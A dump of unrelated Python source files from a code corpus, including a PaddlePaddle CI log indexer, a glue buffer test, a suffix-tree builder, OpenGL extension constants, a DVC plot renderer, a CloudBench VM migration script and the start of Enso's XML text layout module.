content
stringlengths 5
1.05M
|
---|
#coding=utf-8
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from utils.readConfig import ReadConfig
from utils.auth_ipipe import Get_ipipe_auth
from utils.db import Database
from utils import bosclient
import os
import time
import datetime
import logging
from tornado.httpclient import AsyncHTTPClient
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
localConfig = ReadConfig()
logging.basicConfig(
level=logging.INFO,
filename='./logs/event.log',
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
def ifDocumentFix(message):
document_fix = True if 'test=document_fix' in message else False
return document_fix
def ifAlreadyExist(query_stat):
db = Database()
result = list(db.query(query_stat))
queryTime = ''
if len(result) != 0:
queryTime = result[0][0]['time'].split('.')[0].replace('T', ' ')
queryTime = time.strptime(queryTime, '%Y-%m-%d %H:%M:%S')
dt = datetime.datetime.fromtimestamp(time.mktime(queryTime))
actualQueryTime = (
dt + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")
timeArray = time.strptime(actualQueryTime, "%Y-%m-%d %H:%M:%S")
queryTime = int(time.mktime(timeArray))
return queryTime
def generateCiIndex(repo, sha, target_url):
if target_url.startswith('http://10.87.145.41:8111'):
analyze_teamcity_log(target_url)
elif target_url.startswith('https://xly.bce.baidu.com'):
analyze_ipipe_log(sha, target_url)
def analyze_teamcity_log(target_url):
pass
def analyze_ipipe_log(sha, target_url):
index_dict = {}
pipelineBuildid = target_url.split('/')[-3]
stage_url = localConfig.cf.get('ipipeConf', 'stage_url') + pipelineBuildid
session, req = Get_ipipe_auth(stage_url)
try:
res = session.send(req).json()
except Exception as e:
print("Error: %s" % e)
else:
pipelineConfName = res['pipelineConfName']
jobGroupBuildBeans = res['pipelineBuildBean']['stageBuildBeans'][0][
'jobGroupBuildBeans'][0]
PR = res['pipelineBuildBean']['stageBuildBeans'][0]['outParams'][
'AGILE_PULL_ID']
createTime = get_commit_createTime(PR, sha)
index_dict['PR'] = int(PR)
index_dict['commitId'] = sha
index_dict['createTime'] = createTime
for job in jobGroupBuildBeans:
jobName = job['jobName']
if jobName not in ['构建镜像', 'build-docker-image']:
logParam = job['realJobBuild']['logUrl']
startTime = int(str(job['startTime'])[:-3])
endTime = int(str(job['endTime'])[:-3])
index_dict['startTime'] = startTime
index_dict['endTime'] = endTime
logUrl = localConfig.cf.get('ipipeConf', 'log_url') + logParam
getIpipeBuildLog(index_dict, sha, pipelineConfName, logUrl)
def getIpipeBuildLog(index_dict, sha, pipelineConfName, logUrl):
try:
r = requests.get(logUrl)
except Exception as e:
print("Error: %s" % e)
else:
with open("buildLog/%s_%s.log" % (pipelineConfName, sha), "wb") as f:
f.write(r.content)
f.close()
get_index(index_dict, sha, pipelineConfName)
os.remove("buildLog/%s_%s.log" % (pipelineConfName, sha))
def get_index(index_dict, sha, pipelineConfName):
ifInsert = True
db = Database()
filename = '%s_%s.log' % (pipelineConfName, sha)
index_dict['ciName'] = pipelineConfName
f = open('buildLog/%s' % filename, 'r')
logger.info('filename: %s; PR: %s' % (filename, index_dict['PR']))
data = f.read()
buildTime_strlist = data.split('Build Time:', 1)
buildTime = buildTime_strlist[1:][0].split('s')[0].strip()
index_dict['buildTime'] = float(buildTime)
if filename.startswith('PR-CI-Inference'):
fluidInferenceSize_strlist = data.split('FLuid_Inference Size:', 1)
fluidInferenceSize = fluidInferenceSize_strlist[1:][0].split('M')[
0].strip()
index_dict['fluidInferenceSize'] = float(fluidInferenceSize)
testFluidLibTime_strlist = data.split('test_fluid_lib Total Time:', 1)
testFluidLibTime = testFluidLibTime_strlist[1:][0].split('s')[0].strip(
)
index_dict['testFluidLibTime'] = float(testFluidLibTime)
testFluidLibTrainTime_strlist = data.split(
'test_fluid_lib_train Total Time:', 1)
testFluidLibTrainTime = testFluidLibTrainTime_strlist[1:][0].split(
's')[0].strip()
index_dict['testFluidLibTrainTime'] = float(testFluidLibTrainTime)
elif filename.startswith('PR-CI-Coverage') or filename.startswith(
'PR-CI-Py35'):
buildSize_strlist = data.split('Build Size:', 1)
buildSize = buildSize_strlist[1:][0].split('G')[0].strip()
index_dict['buildSize'] = float(buildSize)
WhlSize_strlist = data.split('PR whl Size:', 1)
WhlSize = WhlSize_strlist[1:][0].split('M')[0].strip()
index_dict['WhlSize'] = float(WhlSize)
testCaseCount_single_strlist = data.split('1 card TestCases count is')
testCaseCount_single = 0
for item in testCaseCount_single_strlist[1:]: #原因是单卡的case分了两部分
testCaseCount_single += int(item.split('\n')[0].strip())
index_dict['testCaseCount_single'] = testCaseCount_single
testCaseCount_multi_strlist = data.split('2 card TestCases count is')
testCaseCount_multi = int(testCaseCount_multi_strlist[1:][0].split(
'\n')[0].strip())
index_dict['testCaseCount_multi'] = testCaseCount_multi
testCaseCount_exclusive_strlist = data.split(
'exclusive TestCases count is')
testCaseCount_exclusive = int(testCaseCount_exclusive_strlist[1:][0]
.split('\n')[0].strip())
index_dict['testCaseCount_exclusive'] = testCaseCount_exclusive
testCaseCount_total = testCaseCount_single + testCaseCount_multi + testCaseCount_exclusive
index_dict['testCaseCount_total'] = testCaseCount_total
testCaseTime_single_strlist = data.split(
'1 card TestCases Total Time:')
testCaseTime_single = 0
for item in testCaseTime_single_strlist[1:]: #原因是单卡的case分了两部分
testCaseTime_single += int(item.split('s')[0].strip())
index_dict['testCaseTime_single'] = testCaseTime_single
testCaseTime_multi_strlist = data.split('2 card TestCases Total Time:')
testCaseTime_multi = int(testCaseTime_multi_strlist[1:][0].split('s')[
0].strip())
index_dict['testCaseTime_multi'] = testCaseTime_multi
testCaseTime_exclusive_strlist = data.split(
'exclusive TestCases Total Time:')
testCaseTime_exclusive = int(testCaseTime_exclusive_strlist[1:][0]
.split('s')[0].strip())
index_dict['testCaseTime_exclusive'] = testCaseTime_exclusive
testCaseTime_total_strlist = data.split('TestCases Total Time:')
testCaseTime_total = 0
for item in testCaseTime_total_strlist[1:]:
testCaseTime_total = int(item.split('s')[0].strip()) if int(
item.split('s')[0].strip(
)) > testCaseTime_total else testCaseTime_total
index_dict['testCaseTime_total'] = testCaseTime_total
insertTime = int(time.time())
query_stat = "SELECT * FROM paddle_ci_index WHERE ciName='%s' and commitId='%s' and PR=%s order by time desc" % (
index_dict['ciName'], index_dict['commitId'], index_dict['PR'])
queryTime = ifAlreadyExist(query_stat)
if queryTime != '':
ifInsert = False if insertTime - queryTime < 30 else True
if ifInsert == True:
result = db.insert('paddle_ci_index', index_dict)
if result == True:
logger.info('%s %s %s insert paddle_ci_index success!' %
(pipelineConfName, index_dict['PR'], sha))
else:
logger.info('%s %s %s insert paddle_ci_index failed!' %
(pipelineConfName, index_dict['PR'], sha))
def get_commit_createTime(PR, sha):
"""get commit createtime"""
query_stat = "SELECT createTime FROM commit_create_time WHERE PR=%s and commitId='%s'" % (
PR, sha)
db = Database()
result = list(db.query(query_stat))
if len(result) != 0:
createTime = result[0][0]['createTime']
else:
logger.error("The commit created before 2020-07-03 17:10: %s, %s" %
(PR, sha))
createTime = 0
return createTime
|
import pytest
import numpy as np
from numpy.testing import assert_equal
from glue.core import Data, DataCollection
from glue.core.link_helpers import LinkSame
ARRAY = np.arange(3024).reshape((6, 7, 8, 9)).astype(float)
class TestFixedResolutionBuffer():
def setup_method(self, method):
self.data_collection = DataCollection()
# The reference dataset. Shape is (6, 7, 8, 9).
self.data1 = Data(x=ARRAY)
self.data_collection.append(self.data1)
# A dataset with the same shape but not linked. Shape is (6, 7, 8, 9).
self.data2 = Data(x=ARRAY)
self.data_collection.append(self.data2)
# A dataset with the same number of dimensions but in a different
# order, linked to the first. Shape is (9, 7, 6, 8).
self.data3 = Data(x=np.moveaxis(ARRAY, (3, 1, 0, 2), (0, 1, 2, 3)))
self.data_collection.append(self.data3)
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[0],
self.data3.pixel_component_ids[2]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[1],
self.data3.pixel_component_ids[1]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[2],
self.data3.pixel_component_ids[3]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[3],
self.data3.pixel_component_ids[0]))
# A dataset with fewer dimensions, linked to the first one. Shape is
# (8, 7, 6)
self.data4 = Data(x=ARRAY[:, :, :, 0].transpose())
self.data_collection.append(self.data4)
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[0],
self.data4.pixel_component_ids[2]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[1],
self.data4.pixel_component_ids[1]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[2],
self.data4.pixel_component_ids[0]))
# A dataset with even fewer dimensions, linked to the first one. Shape
# is (8, 6)
self.data5 = Data(x=ARRAY[:, 0, :, 0].transpose())
self.data_collection.append(self.data5)
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[0],
self.data5.pixel_component_ids[1]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[2],
self.data5.pixel_component_ids[0]))
# A dataset that is not on the same pixel grid and requires reprojection
# self.data6 = Data()
# self.data6.coords = SimpleCoordinates()
# self.array_nonaligned = np.arange(60).reshape((5, 3, 4))
# self.data6['x'] = np.array(self.array_nonaligned)
# self.data_collection.append(self.data6)
# self.data_collection.add_link(LinkSame(self.data1.world_component_ids[0],
# self.data6.world_component_ids[1]))
# self.data_collection.add_link(LinkSame(self.data1.world_component_ids[1],
# self.data6.world_component_ids[2]))
# self.data_collection.add_link(LinkSame(self.data1.world_component_ids[2],
# self.data6.world_component_ids[0]))
# Start off with the cases where the data is the target data. Enumerate
# the different cases for the bounds and the expected result.
DATA_IS_TARGET_CASES = [
# Bounds are full extent of data
([(0, 5, 6), (0, 6, 7), (0, 7, 8), (0, 8, 9)],
ARRAY),
# Bounds are inside data
([(2, 3, 2), (3, 3, 1), (0, 7, 8), (0, 7, 8)],
ARRAY[2:4, 3:4, :, :8]),
# Bounds are outside data along some dimensions
([(-5, 9, 15), (3, 5, 3), (0, 9, 10), (5, 6, 2)],
np.pad(ARRAY[:, 3:6, :, 5:7], [(5, 4), (0, 0), (0, 2), (0, 0)],
mode='constant', constant_values=-np.inf)),
# No overlap
([(2, 3, 2), (3, 3, 1), (-5, -4, 2), (0, 7, 8)],
-np.inf * np.ones((2, 1, 2, 8)))
]
@pytest.mark.parametrize(('bounds', 'expected'), DATA_IS_TARGET_CASES)
def test_data_is_target_full_bounds(self, bounds, expected):
buffer = self.data1.compute_fixed_resolution_buffer(target_data=self.data1, bounds=bounds,
target_cid=self.data1.id['x'])
assert_equal(buffer, expected)
buffer = self.data3.compute_fixed_resolution_buffer(target_data=self.data1, bounds=bounds,
target_cid=self.data3.id['x'])
assert_equal(buffer, expected)
|
# -*- coding: utf-8 -*
from east.asts import ast
from east.asts import utils
from east import consts
class NaiveAnnotatedSuffixTree(ast.AnnotatedSuffixTree):
__algorithm__ = consts.ASTAlgorithm.AST_NAIVE
def _construct(self, strings_collection):
"""
Naive generalized suffix tree construction algorithm,
with quadratic [O(n_1^2 + ... + n_m^2)] worst-case time complexity,
where m is the number of strings in collection.
"""
# 0. Add a unique character to each string in the collection,
# to preserve simplicity while building the tree
strings_collection = utils.make_unique_endings(strings_collection)
root = ast.AnnotatedSuffixTree.Node()
root.strings_collection = strings_collection
# For each string in the collection...
for string_ind in xrange(len(strings_collection)):
string = strings_collection[string_ind]
# For each suffix of that string...
# (do not handle unique last characters as suffixes)
for suffix_start in xrange(len(string)-1):
suffix = string[suffix_start:]
# ... first try to find maximal matching path
node = root
child_node = node.chose_arc(suffix)
while child_node:
(str_ind, substr_start, substr_end) = child_node.arc()
match = utils.match_strings(
suffix, strings_collection[str_ind][substr_start:substr_end])
if match == substr_end-substr_start:
# matched the arc, proceed with child node
suffix = suffix[match:]
suffix_start += match
node = child_node
node.weight += 1
child_node = node.chose_arc(suffix)
else:
# ... then, where the matching path ends;
# create new inner node
# (that's the only possible alternative
# since we have unique string endings)
node.remove_child(child_node)
new_node = node.add_new_child(string_ind, suffix_start,
suffix_start+match)
new_leaf = new_node.add_new_child(string_ind, suffix_start+match,
len(string))
(osi, oss, ose) = child_node._arc
child_node._arc = (osi, oss+match, ose)
new_node.add_child(child_node)
new_leaf.weight = 1
new_node.weight = 1 + child_node.weight
suffix = ''
break
# ... or create new leaf if there was no appropriate arc to proceed
if suffix:
new_leaf = node.add_new_child(string_ind, suffix_start, len(string))
new_leaf.weight = 1
# Root will also be annotated by the weight of its children,
# to preserve simplicity while calculating string matching
for k in root.children:
root.weight += root.children[k].weight
return root
|
from docxtpl import DocxTemplate
from constants import monthes
class Saver:
# TODO
"""
Смотри, мне кажется, что когда пользователь указывает нам фотографию,
мы будем копировать её, куда-то в скрытую папке и в б/д хранить путь в секретке
---
GUI -> Saver -> DB
path path
to
row processed
photo photo
"""
pass
def generic_document(session):
doc = DocxTemplate('static/template.docx')
sl = {
'name': user.name,
'surname': user.surname,
'father_name': user.father_name,
'date_of_give': user.profile.date_of_give,
'place_of_pasport': user.profile.place_of_pasport,
'day': date.today().day,
'month': monthes[date.today().month - 1],
'seria': user.profile.seria,
'nomer': user.profile.nomer
}
doc.render(sl)
doc.save('Перс_данные.docx')
if __name__ == '__main__':
from models import *
from datetime import date
user = User(
name='Bulat',
surname='Zaripov',
father_name='Ruslanovi4',
email='[email protected]',
sex='M',
password='LALALALA',
profile=Profile.create()
)
user.profile.seria = '8016'
user.profile.nomer = '234234'
user.profile.date_of_give = date(2016, 12, 3)
user.profile.place_of_pasport = 'Mrakovo'
user.save()
generic_document(user)
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_KHR_texture_compression_astc_ldr'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_KHR_texture_compression_astc_ldr',error_checker=_errors._error_checker)
GL_COMPRESSED_RGBA_ASTC_10x10_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x10_KHR',0x93BB)
GL_COMPRESSED_RGBA_ASTC_10x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x5_KHR',0x93B8)
GL_COMPRESSED_RGBA_ASTC_10x6_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x6_KHR',0x93B9)
GL_COMPRESSED_RGBA_ASTC_10x8_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x8_KHR',0x93BA)
GL_COMPRESSED_RGBA_ASTC_12x10_KHR=_C('GL_COMPRESSED_RGBA_ASTC_12x10_KHR',0x93BC)
GL_COMPRESSED_RGBA_ASTC_12x12_KHR=_C('GL_COMPRESSED_RGBA_ASTC_12x12_KHR',0x93BD)
GL_COMPRESSED_RGBA_ASTC_4x4_KHR=_C('GL_COMPRESSED_RGBA_ASTC_4x4_KHR',0x93B0)
GL_COMPRESSED_RGBA_ASTC_5x4_KHR=_C('GL_COMPRESSED_RGBA_ASTC_5x4_KHR',0x93B1)
GL_COMPRESSED_RGBA_ASTC_5x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_5x5_KHR',0x93B2)
GL_COMPRESSED_RGBA_ASTC_6x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_6x5_KHR',0x93B3)
GL_COMPRESSED_RGBA_ASTC_6x6_KHR=_C('GL_COMPRESSED_RGBA_ASTC_6x6_KHR',0x93B4)
GL_COMPRESSED_RGBA_ASTC_8x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_8x5_KHR',0x93B5)
GL_COMPRESSED_RGBA_ASTC_8x6_KHR=_C('GL_COMPRESSED_RGBA_ASTC_8x6_KHR',0x93B6)
GL_COMPRESSED_RGBA_ASTC_8x8_KHR=_C('GL_COMPRESSED_RGBA_ASTC_8x8_KHR',0x93B7)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x10_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x10_KHR',0x93DB)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x5_KHR',0x93D8)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x6_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x6_KHR',0x93D9)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x8_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x8_KHR',0x93DA)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x10_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x10_KHR',0x93DC)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR',0x93DD)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR',0x93D0)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x4_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x4_KHR',0x93D1)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x5_KHR',0x93D2)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x5_KHR',0x93D3)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x6_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x6_KHR',0x93D4)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x5_KHR',0x93D5)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x6_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x6_KHR',0x93D6)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x8_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x8_KHR',0x93D7)
|
#!/usr/bin/env python
import sys
import os
# ----------------------------------------------------------------------------|
if __name__ == '__main__':
print """Generating Configuration Script for remote Yuma Testing...\n"""
ipAddr = raw_input( "Enter Netconf Agent Ip address: ")
port = raw_input( "Enter Netconf Agent Source Port: ")
user = raw_input( "Enter Netconf User Name: ")
passWd = raw_input( "Enter Netconf User's Password: ")
outFilename = "./config.sh"
out=open( outFilename, 'w' )
out.write( "export YUMA_AGENT_IPADDR="+ipAddr+"\n" )
out.write( "export YUMA_AGENT_PORT="+port+"\n" )
out.write( "export YUMA_AGENT_USER="+user+"\n" )
out.write( "export YUMA_AGENT_PASSWORD="+passWd+"\n" )
print ( "Environment configuration written to %s" % outFilename )
print ( "Source %s with the comman '. %s' to configure the test environment"
% ( outFilename, outFilename ) )
|
import os.path
from typing import Dict, List
import dpath.util
def get_files(plots_data: Dict) -> List:
values = dpath.util.values(plots_data, ["*", "*"])
return sorted({key for submap in values for key in submap.keys()})
def group_by_filename(plots_data: Dict) -> List[Dict]:
files = get_files(plots_data)
grouped = []
for file in files:
grouped.append(dpath.util.search(plots_data, ["*", "*", file]))
return grouped
def squash_plots_properties(data: Dict) -> Dict:
resolved: Dict[str, str] = {}
for rev_data in data.values():
for file_data in rev_data.get("data", {}).values():
props = file_data.get("props", {})
resolved = {**resolved, **props}
return resolved
def match_renderers(plots_data, templates):
from dvc.render import RENDERERS
renderers = []
for group in group_by_filename(plots_data):
plot_properties = squash_plots_properties(group)
template = templates.load(plot_properties.get("template", None))
for renderer_class in RENDERERS:
if renderer_class.matches(group):
renderers.append(
renderer_class(
group, template=template, properties=plot_properties
)
)
return renderers
def render(
repo,
renderers,
metrics=None,
path=None,
html_template_path=None,
refresh_seconds=None,
):
if not html_template_path:
html_template_path = repo.config.get("plots", {}).get(
"html_template", None
)
if html_template_path and not os.path.isabs(html_template_path):
html_template_path = os.path.join(repo.dvc_dir, html_template_path)
from dvc.render.html import write
return write(
path,
renderers,
metrics=metrics,
template_path=html_template_path,
refresh_seconds=refresh_seconds,
)
|
#!/usr/bin/env python
#/*******************************************************************************
# Copyright (c) 2012 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#/*******************************************************************************
#--------------------------------- START CB API --------------------------------
from sys import path, argv
from time import sleep
import fnmatch
import os
import pwd
home = os.environ["HOME"]
username = pwd.getpwuid(os.getuid())[0]
api_file_name = "/tmp/cb_api_" + username
if os.access(api_file_name, os.F_OK) :
try :
_fd = open(api_file_name, 'r')
_api_conn_info = _fd.read()
_fd.close()
except :
_msg = "Unable to open file containing API connection information "
_msg += "(" + api_file_name + ")."
print _msg
exit(4)
else :
_msg = "Unable to locate file containing API connection information "
_msg += "(" + api_file_name + ")."
print _msg
exit(4)
_path_set = False
for _path, _dirs, _files in os.walk(os.path.abspath(path[0] + "/../")):
for _filename in fnmatch.filter(_files, "code_instrumentation.py") :
if _path.count("/lib/auxiliary") :
path.append(_path.replace("/lib/auxiliary",''))
_path_set = True
break
if _path_set :
break
from lib.api.api_service_client import *
_msg = "Connecting to API daemon (" + _api_conn_info + ")..."
print _msg
api = APIClient(_api_conn_info)
#---------------------------------- END CB API ---------------------------------
expid = "ft_" + makeTimestamp().replace(" ", "_")
if len(argv) != 5 :
print "./" + argv[0] + " [cloud_name] [type] [role] [migrate|protect]"
exit(1)
needed_cloud_name = argv[1]
needed_type = argv[2]
needed_role = argv[3]
action = argv[4]
print "Going to resume VM role " + needed_role + " from first saved App of type " + needed_type + "..."
try :
error = False
app = None
api.cldalter(needed_cloud_name, "time", "experiment_id", "not_ready_yet")
apps = api.applist(needed_cloud_name, "all")
if len(apps) == 0 :
print "No saved Apps available. Make some."
exit(1)
found = None
for app in apps :
if app["type"] == needed_type :
found = app
name = None
for vm in app["vms"].split(",") :
uuid, role, temp_name = vm.split("|")
if role == needed_role :
name = temp_name
vm = api.vmshow(needed_cloud_name, uuid)
break
if name is None:
app = None
print needed_role + " vm not found."
exit(1)
break
if not found :
app = None
print needed_type + " application not found."
exit(1)
api.cldalter(needed_cloud_name, "time", "experiment_id", expid)
print "Found App " + app["name"] + ". Generating scripts..."
file1 = "/home/mrhines/ftvm/vmstatus.sh"
file2 = "/home/mrhines/ftvm/qemudebug.sh"
file3 = "/home/mrhines/ftvm/pingvm.sh"
file4 = "/home/mrhines/ftvm/consolevm.sh"
file5 = "/home/mrhines/ftvm/loginvm.sh"
f = open(file1, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("sudo virsh qemu-monitor-command " + vm["cloud_vm_name"] + " --hmp --cmd \"info status\"\n")
f.write("sudo virsh qemu-monitor-command " + vm["cloud_vm_name"] + " --hmp --cmd \"info migrate\"\n")
f.close()
os.chmod(file1, 0755)
f = open(file2, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("gdb /home/mrhines/qemu/x86_64-softmmu/qemu-system-x86_64 --pid $(pgrep -f " + vm["cloud_vm_name"] + ") -ex \"handle SIGUSR2 noprint\" -ex \"\" -ex \"continue\"\n")
f.close()
os.chmod(file2, 0755)
f = open(file3, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("ping " + vm["cloud_ip"] + "\n")
f.close()
os.chmod(file3, 0755)
f = open(file4, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("sudo virsh console " + vm["cloud_uuid"] + "\n")
f.close()
os.chmod(file4, 0755)
f = open(file5, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("ssh klabuser@" + vm["cloud_ip"] + "\n")
f.close()
os.chmod(file5, 0755)
appdetails = api.appshow(needed_cloud_name, app['uuid'])
if appdetails["state"] == "save" :
print "App " + app["name"] + " " + app["uuid"] + " is saved, restoring ..."
api.apprestore(needed_cloud_name, app["uuid"])
secs=10
print "Wait " + str(secs) + " seconds before migrating..."
sleep(secs)
hosts = api.hostlist(needed_cloud_name)
found = False
print "searching for 1st available host to " + action + " to..."
for host in hosts :
if host["cloud_hostname"] != vm["host_name"] :
print "Migrating VM " + name + " to " + host["cloud_hostname"] + "..."
if action == "migrate" :
api.vmmigrate(needed_cloud_name, vm["uuid"], host["name"], vm["migrate_protocol"])
else :
api.vmprotect(needed_cloud_name, vm["uuid"], host["name"], vm["protect_protocol"])
found = True
print "Migrate complete"
if not found :
print "available host not found =("
print "Waiting for CTRL-C..."
while True :
sleep(10)
except APIException, obj :
error = True
print "API Problem (" + str(obj.status) + "): " + obj.msg
except KeyboardInterrupt :
print "Aborting this APP."
except Exception, msg :
error = True
print "Problem during experiment: " + str(msg)
finally :
if app is not None :
try :
print "Destroying application..."
api.appdetach(needed_cloud_name, app["uuid"], True)
except APIException, obj :
print "Error finishing up: (" + str(obj.status) + "): " + obj.msg
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.graphics.xmltextlayout
#
# ----------------------------------------------------------------------------
"""
Module for XML text layout.
This module implements a high-level XML-based interface to the
textlayout module. It also provides a simple style mechanism that
is heavily based on the Cascading Style Sheets (CSS) system.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import logging
import re
import xml.sax
import xml.sax.handler
from collections import namedtuple
from xml.sax.expatreader import SAXParseException
from enso.graphics import font, measurement, textlayout
from enso.utils.memoize import memoized
# Install lxml for speedup
LXML_AVAILABLE = True
try:
from lxml import etree
except Exception as e:
logging.warn("Error importing lxml: %s", e)
logging.warn("Install python-lxml for speed boost")
LXML_AVAILABLE = False
RGBA = namedtuple('RGBA', 'red green blue alpha')
# ----------------------------------------------------------------------------
# Constants
# ----------------------------------------------------------------------------
# Ordinarily, we'd use the unicodedata module for this, but it's a
# hefty file so we'll just define values here.
NON_BREAKING_SPACE = u"\u00a0"
RE_REDUCESPACE = re.compile(r"\s+")
# ----------------------------------------------------------------------------
# Utility functions
# ----------------------------------------------------------------------------
@memoized
def colorHashToRgba(colorHash):
"""
Converts the given HTML-style color hash (e.g., '#aabbcc') or
HTML-with-alpha color hash (e.g. '#aabbccdd') to a quad-color (r,
g, b, a) tuple and returns the result.
Examples:
>>> colorHashToRgba( '#ffffff' )
(1.0, 1.0, 1.0, 1.0)
>>> colorHashToRgba( '#ff000000' )
(1.0, 0.0, 0.0, 0.0)
"""
colorHash = colorHash[1:]
if len(colorHash) == 6:
# It's a RGB hash.
alphaHex = "FF"
elif len(colorHash) == 8:
# It's a RGBA hash.
alphaHex = colorHash[6:8]
else:
raise ValueError("Can't parse color hash for '#%s'" % colorHash)
redHex = colorHash[0:2]
greenHex = colorHash[2:4]
blueHex = colorHash[4:6]
red = float(int(redHex, 16))
green = float(int(greenHex, 16))
blue = float(int(blueHex, 16))
alpha = float(int(alphaHex, 16))
return RGBA(red / 255.0, green / 255.0, blue / 255.0, alpha / 255.0)
def stringToBool(string):
"""
Converts a string with the contents 'true' or 'false' to the
appropriate boolean value.
Examples:
>>> stringToBool( 'true' )
True
>>> stringToBool( 'false' )
False
>>> stringToBool( 'True' )
Traceback (most recent call last):
...
ValueError: can't convert to boolean: True
"""
if string == "true":
return True
elif string == "false":
return False
else:
raise ValueError("can't convert to boolean: %s" % string)
# ----------------------------------------------------------------------------
# Style Properties
# ----------------------------------------------------------------------------
# Style properties that are inherited from a parent element to a child
# element.
STYLE_INHERITED_PROPERTIES = [
# The following properties are identical to the CSS properties of
# the same name, with the exception that any underscores should be
# replaced by hyphens.
"width",
"text_align",
"line_height",
"color",
"font_style",
"font_family",
"font_size",
# This property defines the maximum number of lines that the
# element can contain, and is only valid for Block elements; if
# the element's lines exceed this number and the 'ellipsify'
# property is false, a textlayout.MaxLinesExceededError is raised.
"max_lines",
# This property defines whether or not to truncate a Block element
